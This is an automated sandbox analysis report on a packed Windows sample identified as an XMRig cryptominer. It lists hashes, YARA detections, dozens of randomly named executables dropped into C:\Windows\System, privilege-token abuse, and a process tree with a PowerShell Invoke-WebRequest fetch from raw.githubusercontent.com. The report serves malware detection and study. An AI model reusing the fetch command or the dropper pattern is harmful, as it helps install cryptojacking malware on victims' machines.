xmrig | 1abc63aaaf6866d1a2e67f4ed83292f04364ac33f0f436887e1d6aa2faa6e69c

Analysis

max time kernel
31s
max time network
31s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
30/04/2024, 06:00

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
Size

1.9MB
MD5

092f22f82cb17e20692664f8a499d575
SHA1

546e2ac2da66e8b00fdb8680d40b6e18a719ce15
SHA256

1abc63aaaf6866d1a2e67f4ed83292f04364ac33f0f436887e1d6aa2faa6e69c
SHA512

836c44959306e872cdc95c141f2d149f4f225a8362f599e90b7ab0abcfd0b00c35d23006628baeb14e1158d1e1b6bc86d1f1d95cb0b0159529ae2fcef3e35908
SSDEEP

49152:Lz071uv4BPMkibTIA5lCx7kvRWa4p/pOh:NABG

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 20 IoCs

miner

resource	yara_rule
behavioral2/memory/3052-211-0x00007FF66E130000-0x00007FF66E522000-memory.dmp	xmrig
behavioral2/memory/2728-289-0x00007FF747920000-0x00007FF747D12000-memory.dmp	xmrig
behavioral2/memory/1580-296-0x00007FF617DF0000-0x00007FF6181E2000-memory.dmp	xmrig
behavioral2/memory/3704-297-0x00007FF6C90E0000-0x00007FF6C94D2000-memory.dmp	xmrig
behavioral2/memory/4512-295-0x00007FF7CFEB0000-0x00007FF7D02A2000-memory.dmp	xmrig
behavioral2/memory/3592-294-0x00007FF7ABC50000-0x00007FF7AC042000-memory.dmp	xmrig
behavioral2/memory/3028-293-0x00007FF6A9D80000-0x00007FF6AA172000-memory.dmp	xmrig
behavioral2/memory/2012-292-0x00007FF62C790000-0x00007FF62CB82000-memory.dmp	xmrig
behavioral2/memory/1900-291-0x00007FF7F66C0000-0x00007FF7F6AB2000-memory.dmp	xmrig
behavioral2/memory/4400-290-0x00007FF78F4D0000-0x00007FF78F8C2000-memory.dmp	xmrig
behavioral2/memory/3156-288-0x00007FF79D4C0000-0x00007FF79D8B2000-memory.dmp	xmrig
behavioral2/memory/1260-287-0x00007FF7E77F0000-0x00007FF7E7BE2000-memory.dmp	xmrig
behavioral2/memory/1896-286-0x00007FF6B9120000-0x00007FF6B9512000-memory.dmp	xmrig
behavioral2/memory/1960-285-0x00007FF76E8F0000-0x00007FF76ECE2000-memory.dmp	xmrig
behavioral2/memory/1812-176-0x00007FF6E64E0000-0x00007FF6E68D2000-memory.dmp	xmrig
behavioral2/memory/656-196-0x00007FF62EE20000-0x00007FF62F212000-memory.dmp	xmrig
behavioral2/memory/3720-156-0x00007FF7C31B0000-0x00007FF7C35A2000-memory.dmp	xmrig
behavioral2/memory/1748-151-0x00007FF6A9530000-0x00007FF6A9922000-memory.dmp	xmrig
behavioral2/memory/1324-120-0x00007FF7A7E70000-0x00007FF7A8262000-memory.dmp	xmrig
behavioral2/memory/756-92-0x00007FF6CD670000-0x00007FF6CDA62000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	4272	powershell.exe
12	4272	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
4212	aMsfuTv.exe
4512	jfkwtLN.exe
756	uKgSILJ.exe
1324	vsmeprh.exe
1748	Kpbszdv.exe
3720	TZKOASJ.exe
1812	DUWcqkt.exe
656	MJpdcGx.exe
3052	AbXspXc.exe
1960	RTmwvmb.exe
1896	nNqzkwS.exe
1260	xsvjvUZ.exe
3156	GrDNtzB.exe
1580	jOTbkAf.exe
2728	GfitUzY.exe
4400	rkkxCMc.exe
1900	lwMaBIq.exe
2012	fjBXFVF.exe
3704	QLFbOQW.exe
3028	noqwHLd.exe
3592	wHvyoPa.exe
2552	DuzUITB.exe
1500	WxJJooa.exe
3756	LKeGQuk.exe
5044	WmyNIGt.exe
4176	qIUajZT.exe
2500	cYoGInS.exe
820	lFqKKic.exe
2300	nKgPSfy.exe
3416	qDueRDV.exe
2516	jzokRbz.exe
1800	UPxOfyF.exe
4992	ouhaqJa.exe
2020	FFSUkbb.exe
1228	odIgqnT.exe
2820	WPiWtiF.exe
3784	jCArDBB.exe
2760	AawnHPI.exe
4192	CiJiyNd.exe
4696	FcHEfZS.exe
4312	KfHCmZo.exe
1840	dWFnmBn.exe
4444	tFMKPKx.exe
688	PdXuZty.exe
1940	gCuGdZi.exe
4660	kMhTTfH.exe
1272	SAHfKwy.exe
2376	SxaCLqB.exe
2548	OdLxmRM.exe
2916	IApHoNe.exe
4844	ILiutaf.exe
2288	WCcLrTY.exe
1488	bxFmQpV.exe
3888	bGbIzup.exe
864	DqqmYUh.exe
1416	Ookxupd.exe
2328	iTsPhLz.exe
4580	LTiJMXB.exe
3880	KDljbBb.exe
3264	NofxvOY.exe
3804	hHsOXks.exe
4648	LFylFyL.exe
2540	dehksnf.exe
4088	qcKcWxf.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4756-0-0x00007FF7080A0000-0x00007FF708492000-memory.dmp	upx
behavioral2/files/0x000c000000023b59-5.dat	upx
behavioral2/files/0x000a000000023bb8-7.dat	upx
behavioral2/files/0x000a000000023bbd-36.dat	upx
behavioral2/files/0x000a000000023bc4-70.dat	upx
behavioral2/files/0x000a000000023bd0-130.dat	upx
behavioral2/files/0x000a000000023bd7-158.dat	upx
behavioral2/files/0x000a000000023bce-179.dat	upx
behavioral2/files/0x000a000000023bd1-181.dat	upx
behavioral2/memory/3052-211-0x00007FF66E130000-0x00007FF66E522000-memory.dmp	upx
behavioral2/memory/2728-289-0x00007FF747920000-0x00007FF747D12000-memory.dmp	upx
behavioral2/memory/1580-296-0x00007FF617DF0000-0x00007FF6181E2000-memory.dmp	upx
behavioral2/memory/3704-297-0x00007FF6C90E0000-0x00007FF6C94D2000-memory.dmp	upx
behavioral2/memory/4512-295-0x00007FF7CFEB0000-0x00007FF7D02A2000-memory.dmp	upx
behavioral2/memory/3592-294-0x00007FF7ABC50000-0x00007FF7AC042000-memory.dmp	upx
behavioral2/memory/3028-293-0x00007FF6A9D80000-0x00007FF6AA172000-memory.dmp	upx
behavioral2/memory/2012-292-0x00007FF62C790000-0x00007FF62CB82000-memory.dmp	upx
behavioral2/memory/1900-291-0x00007FF7F66C0000-0x00007FF7F6AB2000-memory.dmp	upx
behavioral2/memory/4400-290-0x00007FF78F4D0000-0x00007FF78F8C2000-memory.dmp	upx
behavioral2/memory/3156-288-0x00007FF79D4C0000-0x00007FF79D8B2000-memory.dmp	upx
behavioral2/memory/1260-287-0x00007FF7E77F0000-0x00007FF7E7BE2000-memory.dmp	upx
behavioral2/memory/1896-286-0x00007FF6B9120000-0x00007FF6B9512000-memory.dmp	upx
behavioral2/memory/1960-285-0x00007FF76E8F0000-0x00007FF76ECE2000-memory.dmp	upx
behavioral2/memory/1812-176-0x00007FF6E64E0000-0x00007FF6E68D2000-memory.dmp	upx
behavioral2/files/0x000a000000023bdb-175.dat	upx
behavioral2/files/0x000a000000023bda-174.dat	upx
behavioral2/files/0x000a000000023bd3-173.dat	upx
behavioral2/files/0x000a000000023bcc-171.dat	upx
behavioral2/files/0x000a000000023bd9-170.dat	upx
behavioral2/files/0x000a000000023bd8-169.dat	upx
behavioral2/memory/656-196-0x00007FF62EE20000-0x00007FF62F212000-memory.dmp	upx
behavioral2/files/0x000a000000023bc9-159.dat	upx
behavioral2/files/0x000a000000023bd6-157.dat	upx
behavioral2/memory/3720-156-0x00007FF7C31B0000-0x00007FF7C35A2000-memory.dmp	upx
behavioral2/files/0x000a000000023bd5-155.dat	upx
behavioral2/memory/1748-151-0x00007FF6A9530000-0x00007FF6A9922000-memory.dmp	upx
behavioral2/files/0x000a000000023bd4-149.dat	upx
behavioral2/files/0x000a000000023bd2-142.dat	upx
behavioral2/files/0x000a000000023bc7-141.dat	upx
behavioral2/files/0x000a000000023bc6-136.dat	upx
behavioral2/files/0x000a000000023bca-165.dat	upx
behavioral2/files/0x000a000000023bcf-129.dat	upx
behavioral2/memory/1324-120-0x00007FF7A7E70000-0x00007FF7A8262000-memory.dmp	upx
behavioral2/files/0x000a000000023bcd-117.dat	upx
behavioral2/files/0x000a000000023bbf-115.dat	upx
behavioral2/files/0x000a000000023bc2-111.dat	upx
behavioral2/files/0x000a000000023bcb-110.dat	upx
behavioral2/files/0x000a000000023bc8-105.dat	upx
behavioral2/files/0x000a000000023bc3-98.dat	upx
behavioral2/files/0x000a000000023bc0-97.dat	upx
behavioral2/files/0x000a000000023bbc-122.dat	upx
behavioral2/memory/756-92-0x00007FF6CD670000-0x00007FF6CDA62000-memory.dmp	upx
behavioral2/files/0x000a000000023bbe-83.dat	upx
behavioral2/files/0x000a000000023bc5-78.dat	upx
behavioral2/files/0x000a000000023bc1-75.dat	upx
behavioral2/files/0x000a000000023bbb-58.dat	upx
behavioral2/files/0x000a000000023bb9-39.dat	upx
behavioral2/files/0x000a000000023bba-32.dat	upx
behavioral2/files/0x000a000000023bb7-28.dat	upx
behavioral2/memory/4212-12-0x00007FF7DA990000-0x00007FF7DAD82000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\WDsYEzV.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\nTvPWZf.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\cMImwbl.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\VjnXfjk.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\hhhVTPZ.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\LPrEnim.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\ItapOkm.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\GiMbiNn.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\qvqzAqd.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\CiKFLzW.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\XufQffR.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\hBkMXeL.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\QWUzbnL.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\mASqWuo.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\RsZqvxl.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\iFDRnjx.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\KsuRwtH.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\xPIOXOQ.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\YJSMNeJ.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\TRBXWOu.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\dCzvILt.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\GRDqdCY.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\qxbnyxY.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\VJEhOzb.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\QtctRmG.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\mDBdyxB.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\ULGNafs.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\IBsJWrN.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\AlYfNfD.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\PYBfCwk.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\Wysqarz.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\NBIsKmJ.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\HvyMgWF.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\KzXeBjC.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\TaXdblH.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\dWFnmBn.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\eCgeXmx.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\xldxYLL.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\YpcUTSv.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\wWXkQQQ.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\GBqCBvj.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\AJkOjER.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\yIHSjkc.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\bGbIzup.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\YkBIxbL.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\TdpDJVB.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\MWuVsgy.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\ROblOMK.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\FNuwHhB.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\JEQBSCv.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\MaZqtCf.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\xTDOvcQ.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\uJlzzCW.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\lNTrQis.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\QDLUELV.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\rMvZfHK.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\nruwpeR.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\kkcjYfS.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\WMsZZya.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\mxHlDTA.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\zGpnDek.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\AzGrUqi.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\hTbgVTi.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
File created	C:\Windows\System\xIfTeEg.exe	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe
4272	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4272	powershell.exe
Token: SeLockMemoryPrivilege	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4756 wrote to memory of 4272	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	86
PID 4756 wrote to memory of 4272	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	86
PID 4756 wrote to memory of 4212	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	87
PID 4756 wrote to memory of 4212	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	87
PID 4756 wrote to memory of 4512	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	88
PID 4756 wrote to memory of 4512	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	88
PID 4756 wrote to memory of 1748	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	89
PID 4756 wrote to memory of 1748	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	89
PID 4756 wrote to memory of 756	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	90
PID 4756 wrote to memory of 756	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	90
PID 4756 wrote to memory of 1324	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	91
PID 4756 wrote to memory of 1324	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	91
PID 4756 wrote to memory of 3720	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	92
PID 4756 wrote to memory of 3720	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	92
PID 4756 wrote to memory of 1960	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	93
PID 4756 wrote to memory of 1960	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	93
PID 4756 wrote to memory of 1812	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	94
PID 4756 wrote to memory of 1812	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	94
PID 4756 wrote to memory of 656	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	95
PID 4756 wrote to memory of 656	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	95
PID 4756 wrote to memory of 3052	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	96
PID 4756 wrote to memory of 3052	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	96
PID 4756 wrote to memory of 1896	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	97
PID 4756 wrote to memory of 1896	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	97
PID 4756 wrote to memory of 1260	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	98
PID 4756 wrote to memory of 1260	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	98
PID 4756 wrote to memory of 3156	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	99
PID 4756 wrote to memory of 3156	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	99
PID 4756 wrote to memory of 1580	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	100
PID 4756 wrote to memory of 1580	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	100
PID 4756 wrote to memory of 2728	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	101
PID 4756 wrote to memory of 2728	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	101
PID 4756 wrote to memory of 4400	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	102
PID 4756 wrote to memory of 4400	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	102
PID 4756 wrote to memory of 1900	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	103
PID 4756 wrote to memory of 1900	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	103
PID 4756 wrote to memory of 2012	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	104
PID 4756 wrote to memory of 2012	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	104
PID 4756 wrote to memory of 3704	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	105
PID 4756 wrote to memory of 3704	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	105
PID 4756 wrote to memory of 3028	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	106
PID 4756 wrote to memory of 3028	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	106
PID 4756 wrote to memory of 3592	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	107
PID 4756 wrote to memory of 3592	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	107
PID 4756 wrote to memory of 2552	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	108
PID 4756 wrote to memory of 2552	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	108
PID 4756 wrote to memory of 1500	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	109
PID 4756 wrote to memory of 1500	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	109
PID 4756 wrote to memory of 3756	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	110
PID 4756 wrote to memory of 3756	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	110
PID 4756 wrote to memory of 5044	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	111
PID 4756 wrote to memory of 5044	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	111
PID 4756 wrote to memory of 4176	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	112
PID 4756 wrote to memory of 4176	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	112
PID 4756 wrote to memory of 2500	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	113
PID 4756 wrote to memory of 2500	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	113
PID 4756 wrote to memory of 820	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	114
PID 4756 wrote to memory of 820	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	114
PID 4756 wrote to memory of 2300	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	115
PID 4756 wrote to memory of 2300	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	115
PID 4756 wrote to memory of 2820	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	116
PID 4756 wrote to memory of 2820	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	116
PID 4756 wrote to memory of 3416	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	117
PID 4756 wrote to memory of 3416	4756	092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe	117

C:\Users\Admin\AppData\Local\Temp\092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\092f22f82cb17e20692664f8a499d575_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4272
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4272" "2956" "2904" "2960" "0" "0" "2964" "0" "0" "0" "0" "0"
    3⤵
    PID:12312
- C:\Windows\System\aMsfuTv.exe
  C:\Windows\System\aMsfuTv.exe
  2⤵
  - Executes dropped EXE
  PID:4212
- C:\Windows\System\jfkwtLN.exe
  C:\Windows\System\jfkwtLN.exe
  2⤵
  - Executes dropped EXE
  PID:4512
- C:\Windows\System\Kpbszdv.exe
  C:\Windows\System\Kpbszdv.exe
  2⤵
  - Executes dropped EXE
  PID:1748
- C:\Windows\System\uKgSILJ.exe
  C:\Windows\System\uKgSILJ.exe
  2⤵
  - Executes dropped EXE
  PID:756
- C:\Windows\System\vsmeprh.exe
  C:\Windows\System\vsmeprh.exe
  2⤵
  - Executes dropped EXE
  PID:1324
- C:\Windows\System\TZKOASJ.exe
  C:\Windows\System\TZKOASJ.exe
  2⤵
  - Executes dropped EXE
  PID:3720
- C:\Windows\System\RTmwvmb.exe
  C:\Windows\System\RTmwvmb.exe
  2⤵
  - Executes dropped EXE
  PID:1960
- C:\Windows\System\DUWcqkt.exe
  C:\Windows\System\DUWcqkt.exe
  2⤵
  - Executes dropped EXE
  PID:1812
- C:\Windows\System\MJpdcGx.exe
  C:\Windows\System\MJpdcGx.exe
  2⤵
  - Executes dropped EXE
  PID:656
- C:\Windows\System\AbXspXc.exe
  C:\Windows\System\AbXspXc.exe
  2⤵
  - Executes dropped EXE
  PID:3052
- C:\Windows\System\nNqzkwS.exe
  C:\Windows\System\nNqzkwS.exe
  2⤵
  - Executes dropped EXE
  PID:1896
- C:\Windows\System\xsvjvUZ.exe
  C:\Windows\System\xsvjvUZ.exe
  2⤵
  - Executes dropped EXE
  PID:1260
- C:\Windows\System\GrDNtzB.exe
  C:\Windows\System\GrDNtzB.exe
  2⤵
  - Executes dropped EXE
  PID:3156
- C:\Windows\System\jOTbkAf.exe
  C:\Windows\System\jOTbkAf.exe
  2⤵
  - Executes dropped EXE
  PID:1580
- C:\Windows\System\GfitUzY.exe
  C:\Windows\System\GfitUzY.exe
  2⤵
  - Executes dropped EXE
  PID:2728
- C:\Windows\System\rkkxCMc.exe
  C:\Windows\System\rkkxCMc.exe
  2⤵
  - Executes dropped EXE
  PID:4400
- C:\Windows\System\lwMaBIq.exe
  C:\Windows\System\lwMaBIq.exe
  2⤵
  - Executes dropped EXE
  PID:1900
- C:\Windows\System\fjBXFVF.exe
  C:\Windows\System\fjBXFVF.exe
  2⤵
  - Executes dropped EXE
  PID:2012
- C:\Windows\System\QLFbOQW.exe
  C:\Windows\System\QLFbOQW.exe
  2⤵
  - Executes dropped EXE
  PID:3704
- C:\Windows\System\noqwHLd.exe
  C:\Windows\System\noqwHLd.exe
  2⤵
  - Executes dropped EXE
  PID:3028
- C:\Windows\System\wHvyoPa.exe
  C:\Windows\System\wHvyoPa.exe
  2⤵
  - Executes dropped EXE
  PID:3592
- C:\Windows\System\DuzUITB.exe
  C:\Windows\System\DuzUITB.exe
  2⤵
  - Executes dropped EXE
  PID:2552
- C:\Windows\System\WxJJooa.exe
  C:\Windows\System\WxJJooa.exe
  2⤵
  - Executes dropped EXE
  PID:1500
- C:\Windows\System\LKeGQuk.exe
  C:\Windows\System\LKeGQuk.exe
  2⤵
  - Executes dropped EXE
  PID:3756
- C:\Windows\System\WmyNIGt.exe
  C:\Windows\System\WmyNIGt.exe
  2⤵
  - Executes dropped EXE
  PID:5044
- C:\Windows\System\qIUajZT.exe
  C:\Windows\System\qIUajZT.exe
  2⤵
  - Executes dropped EXE
  PID:4176
- C:\Windows\System\cYoGInS.exe
  C:\Windows\System\cYoGInS.exe
  2⤵
  - Executes dropped EXE
  PID:2500
- C:\Windows\System\lFqKKic.exe
  C:\Windows\System\lFqKKic.exe
  2⤵
  - Executes dropped EXE
  PID:820
- C:\Windows\System\nKgPSfy.exe
  C:\Windows\System\nKgPSfy.exe
  2⤵
  - Executes dropped EXE
  PID:2300
- C:\Windows\System\WPiWtiF.exe
  C:\Windows\System\WPiWtiF.exe
  2⤵
  - Executes dropped EXE
  PID:2820
- C:\Windows\System\qDueRDV.exe
  C:\Windows\System\qDueRDV.exe
  2⤵
  - Executes dropped EXE
  PID:3416
- C:\Windows\System\jzokRbz.exe
  C:\Windows\System\jzokRbz.exe
  2⤵
  - Executes dropped EXE
  PID:2516
- C:\Windows\System\UPxOfyF.exe
  C:\Windows\System\UPxOfyF.exe
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Windows\System\ouhaqJa.exe
  C:\Windows\System\ouhaqJa.exe
  2⤵
  - Executes dropped EXE
  PID:4992
- C:\Windows\System\FFSUkbb.exe
  C:\Windows\System\FFSUkbb.exe
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Windows\System\odIgqnT.exe
  C:\Windows\System\odIgqnT.exe
  2⤵
  - Executes dropped EXE
  PID:1228
- C:\Windows\System\jCArDBB.exe
  C:\Windows\System\jCArDBB.exe
  2⤵
  - Executes dropped EXE
  PID:3784
- C:\Windows\System\AawnHPI.exe
  C:\Windows\System\AawnHPI.exe
  2⤵
  - Executes dropped EXE
  PID:2760
- C:\Windows\System\CiJiyNd.exe
  C:\Windows\System\CiJiyNd.exe
  2⤵
  - Executes dropped EXE
  PID:4192
- C:\Windows\System\FcHEfZS.exe
  C:\Windows\System\FcHEfZS.exe
  2⤵
  - Executes dropped EXE
  PID:4696
- C:\Windows\System\KfHCmZo.exe
